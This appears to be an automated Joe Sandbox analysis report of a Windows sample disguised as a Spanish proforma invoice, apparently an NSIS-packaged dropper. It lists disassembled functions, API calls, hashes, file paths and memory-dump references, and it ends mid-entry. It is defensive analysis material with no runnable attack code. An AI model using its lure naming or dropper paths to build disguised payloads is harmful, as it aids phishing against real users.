                                                  control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406031 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406541 call 405e5c call 406541 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 398 403135-40314c 395->398 402 403225-403228 396->402 403 403278-40327d 396->403 400 403150-403159 call 4034be 398->400 401 40314e 398->401 410 40327f-403287 call 40303e 400->410 411 40315f-403166 400->411 401->400 405 40322a-403242 call 4034d4 call 4034be 402->405 406 40324c-403276 GlobalAlloc call 4034d4 call 4032d9 402->406 403->388 405->403 433 403244-40324a 405->433 406->403 432 403289-40329a 406->432 410->403 415 4031e2-4031e6 411->415 416 403168-40317c call 405fec 411->416 421 4031f0-4031f6 415->421 422 4031e8-4031ef call 40303e 415->422 416->421 430 40317e-403185 416->430 423 403205-40320d 421->423 424 4031f8-403202 call 406a22 421->424 422->421 423->398 431 403213 423->431 424->423 430->421 436 403187-40318e 430->436 431->396 437 4032a2-4032a7 432->437 438 40329c 432->438 433->403 433->406 436->421 439 403190-403197 436->439 440 4032a8-4032ae 437->440 438->437 439->421 441 403199-4031a0 439->441 440->440 442 4032b0-4032cb SetFilePointer call 405fec 440->442 441->421 443 4031a2-4031c2 441->443 446 4032d0 442->446 443->403 445 4031c8-4031cc 443->445 447 4031d4-4031dc 445->447 448 4031ce-4031d2 445->448 446->388 447->421 449 4031de-4031e0 447->449 448->431 448->447 449->421
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004030B3
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,00000400), ref: 004030CF
                                                    • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,80000000,00000003), ref: 00406035
                                                    • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406057
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,80000000,00000003), ref: 0040311B
                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-260537731
                                                  • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                  • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                                  • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                  • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D
                                                  Function 0040657E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 671 40657e-406587 672 406589-406598 671->672 673 40659a-4065b4 671->673 672->673 674 4067c4-4067ca 673->674 675 4065ba-4065c6 673->675 677 4067d0-4067dd 674->677 678 4065d8-4065e5 674->678 675->674 676 4065cc-4065d3 675->676 676->674 680 4067e9-4067ec 677->680 681 4067df-4067e4 call 406541 677->681 678->677 679 4065eb-4065f4 678->679 682 4067b1 679->682 683 4065fa-40663d 679->683 681->680 685 4067b3-4067bd 682->685 686 4067bf-4067c2 682->686 687 406643-40664f 683->687 688 406755-406759 683->688 685->674 686->674 689 406651 687->689 690 406659-40665b 687->690 691 40675b-406762 688->691 692 40678d-406791 688->692 689->690 697 406695-406698 690->697 698 40665d-406683 call 40640f 690->698 695 406772-40677e call 406541 691->695 696 406764-406770 call 406488 691->696 693 4067a1-4067af lstrlenW 692->693 694 406793-40679c call 40657e 692->694 693->674 694->693 706 406783-406789 695->706 696->706 700 40669a-4066a6 GetSystemDirectoryW 697->700 701 4066ab-4066ae 697->701 711 406689-406690 call 40657e 698->711 712 40673d-406740 698->712 707 406738-40673b 700->707 708 4066c0-4066c4 701->708 709 4066b0-4066bc GetWindowsDirectoryW 701->709 706->693 713 40678b 706->713 707->712 714 40674d-406753 call 4067ef 707->714 708->707 715 4066c6-4066e4 708->715 709->708 711->707 712->714 717 406742-406748 lstrcatW 712->717 713->714 714->693 719 4066e6-4066ec 715->719 720 4066f8-406704 call 406935 715->720 717->714 724 4066f4-4066f6 719->724 727 40670c-406710 720->727 724->720 726 406732-406736 724->726 726->707 728 406712-406725 SHGetPathFromIDListW CoTaskMemFree 727->728 729 406727-406730 727->729 728->726 728->729 729->715 729->726
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066A0
                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
                                                  • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406714
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4024019347-266345325
                                                  • Opcode ID: fc1dd504962f454d72de7fc8bd3fa5b90e0c752258918fd1551a188d423c3a78
                                                  • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                                  • Opcode Fuzzy Hash: fc1dd504962f454d72de7fc8bd3fa5b90e0c752258918fd1551a188d423c3a78
                                                  • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E
                                                  Function 00401794 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 794 401794-4017b9 call 402dcb call 405e87 799 4017c3-4017d5 call 406541 call 405e10 lstrcatW 794->799 800 4017bb-4017c1 call 406541 794->800 805 4017da-4017db call 4067ef 799->805 800->805 809 4017e0-4017e4 805->809 810 4017e6-4017f0 call 40689e 809->810 811 401817-40181a 809->811 818 401802-401814 810->818 819 4017f2-401800 CompareFileTime 810->819 813 401822-40183e call 406031 811->813 814 40181c-40181d call 40600c 811->814 821 401840-401843 813->821 822 4018b2-4018db call 4055c6 call 4032d9 813->822 814->813 818->811 819->818 823 401894-40189e call 4055c6 821->823 824 401845-401883 call 406541 * 2 call 40657e call 406541 call 405ba1 821->824 836 4018e3-4018ef SetFileTime 822->836 837 4018dd-4018e1 822->837 834 4018a7-4018ad 823->834 824->809 856 401889-40188a 824->856 838 402c58 834->838 840 4018f5-401900 CloseHandle 836->840 837->836 837->840 842 402c5a-402c5e 838->842 843 401906-401909 840->843 844 402c4f-402c52 840->844 846 40190b-40191c call 40657e lstrcatW 843->846 847 40191e-401921 call 40657e 843->847 844->838 851 401926-4023bd 846->851 847->851 857 4023c2-4023c7 851->857 858 4023bd call 405ba1 851->858 856->834 859 40188c-40188d 856->859 857->842 858->857 859->823
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet,?,?,00000031), ref: 004017D5
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet,?,?,00000031), ref: 004017FA
                                                    • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,Baboodom111 Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                    • Part of subcall function 004055C6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                    • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                    • Part of subcall function 004055C6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00403412,00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405621
                                                    • Part of subcall function 004055C6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll), ref: 00405633
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet$C:\Users\user\AppData\Local\Temp\nskBC9B.tmp$C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll$Call
                                                  • API String ID: 1941528284-1382444632
                                                  • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                  • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                                  • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                  • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D
                                                  Function 004055C6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 860 4055c6-4055db 861 4055e1-4055f2 860->861 862 405692-405696 860->862 863 4055f4-4055f8 call 40657e 861->863 864 4055fd-405609 lstrlenW 861->864 863->864 866 405626-40562a 864->866 867 40560b-40561b lstrlenW 864->867 869 405639-40563d 866->869 870 40562c-405633 SetWindowTextW 866->870 867->862 868 40561d-405621 lstrcatW 867->868 868->866 871 405683-405685 869->871 872 40563f-405681 SendMessageW * 3 869->872 870->869 871->862 873 405687-40568a 871->873 872->871 873->862
                                                  APIs
                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                  • lstrlenW.KERNEL32(00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00403412,00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405621
                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll), ref: 00405633
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll
                                                  • API String ID: 2531174081-3011699776
                                                  • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                  • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                                  • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                  • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58
                                                  Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 874 402711-40272a call 402da9 877 402730-402737 874->877 878 402c4f-402c52 874->878 879 402739 877->879 880 40273c-40273f 877->880 881 402c58-402c5e 878->881 879->880 882 4028a3-4028ab 880->882 883 402745-402754 call 4064a1 880->883 882->878 883->882 887 40275a 883->887 888 402760-402764 887->888 889 4027f9-4027fc 888->889 890 40276a-402785 ReadFile 888->890 891 402814-402824 call 4060b4 889->891 892 4027fe-402801 889->892 890->882 893 40278b-402790 890->893 891->882 902 402826 891->902 892->891 894 402803-40280e call 406112 892->894 893->882 896 402796-4027a4 893->896 894->882 894->891 899 4027aa-4027bc MultiByteToWideChar 896->899 900 40285f-40286b call 406488 896->900 899->902 903 4027be-4027c1 899->903 900->881 906 402829-40282c 902->906 907 4027c3-4027ce 903->907 906->900 908 40282e-402833 906->908 907->906 909 4027d0-4027f5 SetFilePointer MultiByteToWideChar 907->909 910 402870-402874 908->910 911 402835-40283a 908->911 909->907 912 4027f7 909->912 913 402891-40289d SetFilePointer 910->913 914 402876-40287a 910->914 911->910 915 40283c-40284f 911->915 912->902 913->882 916 402882-40288f 914->916 917 40287c-402880 914->917 915->882 918 402851-402857 915->918 916->882 917->913 917->916 918->888 919 40285d 918->919 919->882
                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004027B8
                                                  • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027DB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027F1
                                                    • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406128
                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040289D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                  • Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
                                                  • Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                  • Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
                                                  Function 004032D9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 920 4032d9-4032f0 921 4032f2 920->921 922 4032f9-403301 920->922 921->922 923 403303 922->923 924 403308-40330d 922->924 923->924 925 40331d-40332a call 4034be 924->925 926 40330f-403318 call 4034d4 924->926 930 403330-403334 925->930 931 403475 925->931 926->925 932 40333a-40335a GetTickCount call 406a90 930->932 933 40345e-403460 930->933 934 403477-403478 931->934 946 4034b4 932->946 948 403360-403368 932->948 935 403462-403465 933->935 936 4034a9-4034ad 933->936 938 4034b7-4034bb 934->938 939 403467 935->939 940 40346a-403473 call 4034be 935->940 941 40347a-403480 936->941 942 4034af 936->942 939->940 940->931 954 4034b1 940->954 944 403482 941->944 945 403485-403493 call 4034be 941->945 942->946 944->945 945->931 956 403495-4034a1 call 4060e3 945->956 946->938 951 40336a 948->951 952 40336d-40337b call 4034be 948->952 951->952 952->931 958 403381-40338a 952->958 954->946 963 4034a3-4034a6 956->963 964 40345a-40345c 956->964 960 403390-4033ad call 406ab0 958->960 966 4033b3-4033ca GetTickCount 960->966 967 403456-403458 960->967 963->936 964->934 968 403415-403417 966->968 969 4033cc-4033d4 966->969 967->934 972 403419-40341d 968->972 973 40344a-40344e 968->973 970 4033d6-4033da 969->970 971 4033dc-40340d MulDiv wsprintfW call 4055c6 969->971 970->968 970->971 979 403412 971->979 976 403432-403438 972->976 977 40341f-403424 call 4060e3 972->977 973->948 974 403454 973->974 974->946 978 40343e-403442 976->978 982 403429-40342b 977->982 978->960 981 403448 978->981 979->968 981->946 982->964 983 40342d-403430 982->983 983->978
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 551687249-2449383134
                                                  • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                  • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                                  • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                  • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9
                                                  Function 004068C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 984 4068c5-4068e5 GetSystemDirectoryW 985 4068e7 984->985 986 4068e9-4068eb 984->986 985->986 987 4068fc-4068fe 986->987 988 4068ed-4068f6 986->988 990 4068ff-406932 wsprintfW LoadLibraryExW 987->990 988->987 989 4068f8-4068fa 988->989 989->990
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                  • wsprintfW.USER32 ref: 00406917
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME
                                                  • API String ID: 2200240437-1106614640
                                                  • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                  • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
